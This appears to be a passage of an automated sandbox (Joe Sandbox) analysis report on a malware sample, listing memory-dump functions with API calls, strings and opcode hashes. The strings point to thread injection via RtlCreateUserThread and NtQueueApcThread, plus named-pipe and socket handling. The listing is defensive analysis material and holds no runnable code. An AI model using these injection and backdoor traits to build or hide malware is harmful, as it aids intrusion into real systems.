                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AccountInformationLookupToken_snprintf
                • String ID: %s\%s
                • API String ID: 2107350476-4073750446
                • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                • Instruction ID: 76ff5fb1b92f255e071d72172c76c5275d98a87628965d455dad0b8e360381d6
                • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                • Instruction Fuzzy Hash: 2E213032204FC196EB24DF61E8547DA7369F788B88F448126EA8D57B18DF39C31AC740
                APIs
                • IsProcessorFeaturePresent.KERNEL32 ref: 00688B8A
                • __crtCapturePreviousContext.LIBCMT ref: 00688BA1
                • __raise_securityfailure.LIBCMT ref: 00688C43
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CaptureContextFeaturePresentPreviousProcessor__crt__raise_securityfailure
                • String ID: Pj
                • API String ID: 2585579334-1109624870
                • Opcode ID: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                • Instruction ID: e072f98f297580da6a0260de77f9bdce81e2c4c5eefec8c9f79deadb00f27ec1
                • Opcode Fuzzy Hash: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                • Instruction Fuzzy Hash: 68210775704B4085EB50AB18F86135477AAF78A348F90022AEA8D577B1EF7FC865CB01
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: RtlCreateUserThread$ntdll.dll
                • API String ID: 1646373207-2935400652
                • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                • Instruction ID: 412f3c1fad01ec40b37c44b9036fff2b84c8986c87c1a8c8b4a2999c95763c34
                • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                • Instruction Fuzzy Hash: BD016D32314B8192DB20CF11F894749B7A9FB88B80F998135EA9D43B14DF38C5A9C700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 1646373207-1374908105
                • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                • Instruction ID: f038d303a48577b73559bf0d1ae69cbde89ae8da4f8355f731266a35975aac91
                • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                • Instruction Fuzzy Hash: E601D125300B9292DB008F22F85435AB3A5FB89FD0F988625EF5C43B28DF38C5A68300
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsWow64Process$kernel32
                • API String ID: 1646373207-3789238822
                • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                • Instruction ID: e2daee7cb0072110a92526451e8d9e6f4daa953fa947003dfc671c17928fab38
                • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                • Instruction Fuzzy Hash: ACE04FA172270292FE05CB55E8A47656366EB88B91F481010D94B4AB65EF3DC5A9C710
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32
                • API String ID: 1646373207-3900151262
                • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                • Instruction ID: 3879d7efb5108f01c7375b1c336d0e57c507da3620a91ff4996a8e67f594b482
                • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                • Instruction Fuzzy Hash: 11D0A710752607A1FE089B91FC747A41356BB5AF40F4C1020891E0B720EE3DC1EDC350
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32
                • API String ID: 1646373207-736604160
                • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                • Instruction ID: 4cd60276b6661a869d07d975088d21ef58a001d1a22f5fda6036dc8d0c00d3b0
                • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                • Instruction Fuzzy Hash: FBD0A710712607A1FE049BD1FC747A46356AB49F40F4C1021881E0A720EE3DC1EAC350
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction ID: 9cd805be13f1b3885f796fd01702c1fa5e39bc59ddbb0bb5b327f8e09bdc8491
                • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction Fuzzy Hash: D8519572605784CAE728CF19E9C57EC33A1F758B95F25412ADE1A4BBA1DB78C442CB80
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction ID: 6eaaa9ab1a844fe88417ef1eff5ff3034109cd015612bf2cdfcfbf95f85d5a18
                • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction Fuzzy Hash: 0051BF32741640CAD714EF29E8853A833E2F769B64F24823DDA1A5B761CB3EC452CF91
                APIs
                  • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B262E
                  • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B264C
                  • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2664
                  • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2671
                  • Part of subcall function 001B25F4: rand.LIBCMT ref: 001B273D
                • strchr.LIBCMT ref: 001B21D6
                • _snprintf.LIBCMT ref: 001B220C
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • _snprintf.LIBCMT ref: 001B2223
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                • String ID: not create token: %d
                • API String ID: 1095232423-2272930512
                • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                • Instruction ID: dd83be3cdc38468e2d72b40f691b647392f28cd9c647279351a05b32f2482063
                • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                • Instruction Fuzzy Hash: 8441C066614EC091EA159F6ED1852E8B3B0FF98B95F085512DF8D67B20EF34D1B6C340
                APIs
                • malloc.LIBCMT ref: 00674A45
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • htonl.WS2_32 ref: 00674A5B
                  • Part of subcall function 00674C44: PeekNamedPipe.KERNEL32 ref: 00674C7C
                • WaitForSingleObject.KERNEL32 ref: 00674AB6
                • free.LIBCMT ref: 00674AF2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                • String ID:
                • API String ID: 2495333179-0
                • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                • Instruction ID: 4648d0429a6de1d140e44e85e96c72b2234793a88890e8b2bc710f0046024de4
                • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                • Instruction Fuzzy Hash: 2321E13670064086DB64EF62E54876A73ABFB89B98F09C518DE5D0B71CEF38C891C748
                APIs
                • _time64.LIBCMT ref: 0067C254
                  • Part of subcall function 0068145C: GetSystemTimeAsFileTime.KERNEL32 ref: 0068146A
                  • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                • malloc.LIBCMT ref: 0067C29C
                • strtok.LIBCMT ref: 0067C300
                • strtok.LIBCMT ref: 0067C311
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Timestrtok$FileSystem_getptd_time64malloc
                • String ID:
                • API String ID: 460628555-0
                • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                • Instruction ID: 8085eb6fc398f76177e30c2a2fe397d02a9ce9bf3850a8c026e00e981c306913
                • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                • Instruction Fuzzy Hash: 042124B6600B9481DB40DF91E08866D37AAF788FE4B06822AEF2E47742CF30C542C784
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CE9FC
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001CEA08
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _invalid_parameter_noinfo.LIBCMT ref: 001CEA13
                • strchr.LIBCMT ref: 001CEA29
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                • String ID:
                • API String ID: 4151157258-0
                • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                • Instruction ID: df1a2f1e0fb05b95aa4e2a41103ac0155ce180c4fd263ffc718e7481fa4e2d62
                • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                • Instruction Fuzzy Hash: 9C1122632083E489CB2596219050B3ABAD0F3B5FD5B1D812DEAD70BA45CB2CC541CB50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction ID: dba1a0da941d908dcf79781d7b2a93baaae24648750842988d629b3281201762
                • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction Fuzzy Hash: 19114826A04748895732EEA6748052BF690FB9D390F190035FE4403205EB74C881CF41
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction ID: 24348d802dc2d1f08a0c155925a8388473e2b6d20b6d7e2de2e238697d943f74
                • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction Fuzzy Hash: 04116632A04788599770EFA6A88156BF692FB8B3D0F1D0235EF944B705EA75CC82C740
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068F5FC
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 0068F608
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _invalid_parameter_noinfo.LIBCMT ref: 0068F613
                • strchr.LIBCMT ref: 0068F629
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                • String ID:
                • API String ID: 4151157258-0
                • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                • Instruction ID: 57340b939f474d349f093d2e7be4e21bbf8914060297e7e2e26b8cd3160c6e13
                • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                • Instruction Fuzzy Hash: E21104626082E481CB207B25905027EB7A2E785FE4B1C8339FBD64BB65FA6CC4C3C710
                APIs
                • accept.WS2_32 ref: 0067EF71
                • send.WS2_32 ref: 0067EFAF
                • send.WS2_32 ref: 0067EFC3
                • closesocket.WS2_32 ref: 0067EFD4
                  • Part of subcall function 0067F098: closesocket.WS2_32 ref: 0067F0A4
                  • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0AE
                  • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0B7
                  • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0C0
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$closesocketsend$accept
                • String ID:
                • API String ID: 47150829-0
                • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                • Instruction ID: cf58eb68758bca1531fd76496b1870bd21c618929383d594a1707bb9788da1b2
                • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                • Instruction Fuzzy Hash: 7E012C7531494181DB549B36E965B292362E78DFF4F149211DE2A07F85CE3AC4958B40
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                • Instruction ID: 94c007245e2648addf3c19d2b24951ee6a5b039a2cf0f1d7f3946ca565b745a6
                • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                • Instruction Fuzzy Hash: 24F0A432614E5192E7108B25F84431AA3A6F784B81F648160DB8E42E78DE79C4D18705
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                • Instruction ID: 731b81161f5110ee6af5e0396237b43d73dcf653e201295d023d5e07bafe4612
                • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                • Instruction Fuzzy Hash: D7F0A432614A5192E7108B25F85431BB766F785B94F648120DB8D42F74DF3DC8918B04
                APIs
                • InitializeProcThreadAttributeList.KERNEL32 ref: 0067770E
                • GetProcessHeap.KERNEL32 ref: 00677714
                • HeapAlloc.KERNEL32 ref: 00677724
                • InitializeProcThreadAttributeList.KERNEL32 ref: 0067773F
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                • String ID:
                • API String ID: 1212816094-0
                • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                • Instruction ID: f678ab742e7207cbd561e49493ae46e7ce0d9f2ae07cae3b3ba7a2ec787c370f
                • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                • Instruction Fuzzy Hash: 65F0BB2672564192DB58CB75F45075A63A6EB8CB90F585436FB0F42B14DE3DC4958B00
                APIs
                • closesocket.WS2_32 ref: 0067F0A4
                • free.LIBCMT ref: 0067F0AE
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • free.LIBCMT ref: 0067F0B7
                • free.LIBCMT ref: 0067F0C0
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                • String ID:
                • API String ID: 1525665891-0
                • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                • Instruction ID: d39bbc40504ba38ceb802984a6386ecaa7359909dca3ee8dfc6d7303dc756805
                • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                • Instruction Fuzzy Hash: 9ED09E2671844481DF54EFF2D8A663C1322E7D8F94F1440359E2E4B366CD64CD95C348
                Strings
                • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                • Unknown pseudo relocation bit size %d., xrefs: 00402294
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID:
                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                • API String ID: 0-395989641
                • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                APIs
                Strings
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                • API String ID: 1804819252-157664173
                • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: __set_app_type
                • String ID: 06E$P0E
                • API String ID: 1108511539-3978550416
                • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                APIs
                • _errno.LIBCMT ref: 001BECB1
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _invalid_parameter_noinfo.LIBCMT ref: 001BECBC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID: B
                • API String ID: 1812809483-1255198513
                • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                • Instruction ID: 4ab64148a078f30f592bfda4bf66d86ddaf9101564b499946e096a0180613029
                • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                • Instruction Fuzzy Hash: 31018472614B5486EB109F12D4447D9B6A1F7A9FE4F584325EF5817B95CF38C144CB00
                APIs
                • _errno.LIBCMT ref: 0067F8B1
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _invalid_parameter_noinfo.LIBCMT ref: 0067F8BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID: B
                • API String ID: 1812809483-1255198513
                • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                • Instruction ID: 696ec82873bee636f2cfc17656ce8eca3729c8e3e8ee0a98847dae6747d9afc8
                • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                • Instruction Fuzzy Hash: 9001ADB2620B4086DB109F12E440799B662FB98FE4FA88325AF5C07BA5CF38C141CB04
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Unknown error, xrefs: 00401D2C
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-3474627141
